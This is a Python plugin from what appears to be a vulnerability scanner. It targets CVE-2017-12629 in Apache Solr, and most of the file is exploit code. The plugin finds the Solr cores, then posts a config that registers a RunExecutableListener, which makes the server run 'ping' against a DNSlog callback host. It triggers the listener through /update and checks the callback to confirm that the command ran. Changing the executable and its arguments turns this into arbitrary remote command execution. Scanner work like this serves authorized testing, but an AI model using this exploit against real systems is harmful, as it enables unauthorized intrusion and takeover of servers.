#!/usr/bin/env python
# -*- coding: utf-8 -*-

__author__ = 'Ascotbe'
import requests
import json
import time
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,Dnslog,randoms,ErrorHandling,Proxies
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="CVE-2017-12629" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "Ascotbe"  # 插件作者
        self.info['create_date'] = "2020-2-19"  # 插件编辑时间
        self.info['disclosure']='2017-10-26'#漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "SolrRemoteCodeExecutionVulnerability2"  # 插件名称
        self.info['name'] ='Solr远程代码执行漏洞2' #漏洞名称
        self.info['affects'] = "Solr"  # 漏洞组件
        self.info['desc_content'] = "原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过http收到一个XML/JSON响应来实现。"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['suggest'] = "尽快升级最新系统"  # 修复建议
        self.info['version'] = "7.1.0之前版本"  # 这边填漏洞影响的版本
        self.info['details'] = Medusa  # 结果


def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:

        payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
        step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x
            payload = "/solr/"+name+"/config"
            payload2 = "/solr/" + name + "/update"
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            DL = Dnslog()  # 初始化DNSlog
            rm=randoms().result(10)
            data1='''{"add-listener":{"event":"postCommit","name":"'''+rm+'''","class":"solr.RunExecutableListener","exe":"ping","dir":"/usr/bin/","args":["'''+DL.dns_host()+'''"]}}'''
            data2='''[{"id":"'''+rm+'''"}]'''
            Headers2 = Headers
            Headers2['Accept'] ='application/json'
            Headers2["Content-Type"]="application/json"
            #POC没问题DNSlog有问题
            #DL="p61rpm.dnslog.cn"
            resp = requests.post(payload_url,data=data1,headers=Headers,proxies=proxies, timeout=6, verify=False)
            resp2 = requests.post(payload_url2, data=data2, headers=Headers2, proxies=proxies,timeout=6, verify=False)
            time.sleep(3)
            if DL.result():
                Medusa = "{}存在Solr远程代码执行漏洞(CVE-2017-12629)\r\n 验证数据:\r\n漏洞位置:{}\r\n模板返回值:{}\r\n执行结果:{}\r\n".format(url,payload_url,resp.text,resp2.text)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
                WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
